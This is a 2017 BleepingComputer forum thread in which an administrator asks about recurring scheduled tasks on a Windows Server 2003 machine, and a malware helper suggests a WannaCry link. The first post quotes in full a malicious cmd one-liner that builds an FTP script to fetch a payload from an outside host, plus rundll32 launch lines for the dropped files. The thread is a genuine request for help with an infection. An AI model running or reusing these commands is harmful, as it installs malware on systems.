Jump to content


 


Register a free account to unlock additional features at BleepingComputer.com
Welcome to BleepingComputer, a free community where people like yourself come together to discuss and learn how to use their computers. Using the site is easy and fun. As a guest, you can browse and view the various discussions in the forums, but can not create a new topic or reply to an existing one unless you are logged in. Other benefits of registering an account are subscribing to topics and forums, creating a blog, and having no ads shown anywhere on the site.


Click here to Register a free account now! or read our Welcome Guide to learn how to use this site.

Photo

Mysa1.job, Mysa2.job, and ok.job show up every morning in 2003 Server


  • This topic is locked This topic is locked
3 replies to this topic

#1 IT_Architect

IT_Architect

  • Members
  • 2 posts
  • OFFLINE
  •  
  • Local time:01:56 PM

Posted 04 July 2017 - 10:50 AM

Scans come up clean on Trend Micro and MalwareBytes but Mysa1.job, Mysa2.job, and ok. job show up every morning in a 2003 Server and none of the others.  If I delete the jobs, they will be back in the following morning.  They all say run at startup.
Mysa1.job - C:\WINDOWS\system32\rundll32.exe c:\windows\debug\item.dat,ServiceMain aaaa
Mysa2.job - cmd /c echo open ftp.oo000oo.me>p&echo test>>p&echo 1433>>p&echo get s.dat c:\windows\debug\item.dat>>p&echo bye>>p&ftp -s:p

ok.job - C:\WINDOWS\system32\rundll32.exe c:\windows\debug\ok.dat,ServiceMain aaaa

I know these are old OSes but they are tied to software.  I can shut off their Internet access if necessary.

Does anyone know what these are?

PS:  I see in quarantine. backdoor.forshare that was taken out earlier as c:\Windows\Debug\item.dat

That's a problem.  Anyone know if this is fixable?


Edited by IT_Architect, 04 July 2017 - 11:07 AM.


BC AdBot (Login to Remove)

 


#2 JSntgRvr

JSntgRvr

    Master Surgeon General


  • Malware Response Team
  • 11,679 posts
  • ONLINE
  •  
  • Gender:Male
  • Location:Puerto Rico
  • Local time:01:56 PM

Posted 04 July 2017 - 08:09 PM

That seems to be part of Ransomware Wannacry,

 

Please follow the instructions here and post the require reports.


No request for help throughout private messaging will be attended.

If I have helped you, consider making a donation to help me continue the fight against Malware!
btn_donate_SM.gif


#3 JSntgRvr

JSntgRvr

    Master Surgeon General


  • Malware Response Team
  • 11,679 posts
  • ONLINE
  •  
  • Gender:Male
  • Location:Puerto Rico
  • Local time:01:56 PM

Posted 09 July 2017 - 08:14 PM

Due to the lack of feedback, this topic is now closed.

In the event you still have problems, please send me or any Moderator a Private Message and ask them to reopen this topic within the next 5 days.

Please include a link to your topic in the Private Message. Thank you.

No request for help throughout private messaging will be attended.

If I have helped you, consider making a donation to help me continue the fight against Malware!
btn_donate_SM.gif


#4 JSntgRvr

JSntgRvr

    Master Surgeon General


  • Malware Response Team
  • 11,679 posts
  • ONLINE
  •  
  • Gender:Male
  • Location:Puerto Rico
  • Local time:01:56 PM

Posted 18 August 2017 - 01:32 PM

Posted in error.

Edited by JSntgRvr, 18 August 2017 - 04:42 PM.

No request for help throughout private messaging will be attended.

If I have helped you, consider making a donation to help me continue the fight against Malware!
btn_donate_SM.gif





0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users